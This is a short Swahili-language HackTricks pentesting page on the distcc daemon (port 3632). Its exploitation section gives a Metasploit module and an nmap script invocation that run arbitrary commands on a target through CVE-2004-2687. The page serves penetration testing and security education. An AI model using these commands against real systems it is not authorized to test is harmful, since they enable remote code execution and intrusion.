tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Taarifa za Msingi

Distcc ni chombo kinachoboresha mchakato wa uundaji kwa kutumia nguvu ya usindikaji isiyotumika ya kompyuta nyingine katika mtandao. Wakati distcc imewekwa kwenye mashine, mashine hii ina uwezo wa kusambaza kazi zake za uundaji kwa mfumo mwingine. Mfumo huu wa kupokea lazima uwe unatumia distccd daemon na lazima uwe na compiler inayofaa iliyowekwa ili kushughulikia msimbo uliopelekwa.

Bandari ya kawaida: 3632

PORT     STATE SERVICE
3632/tcp open  distccd

Utekelezaji

Angalia ikiwa ina udhaifu wa CVE-2004-2687 ili kutekeleza msimbo wowote:

bash
msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"

Shodan

Sidhani kama shodan inagundua huduma hii.

Resources

Post created by Álex B (@r1p)

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks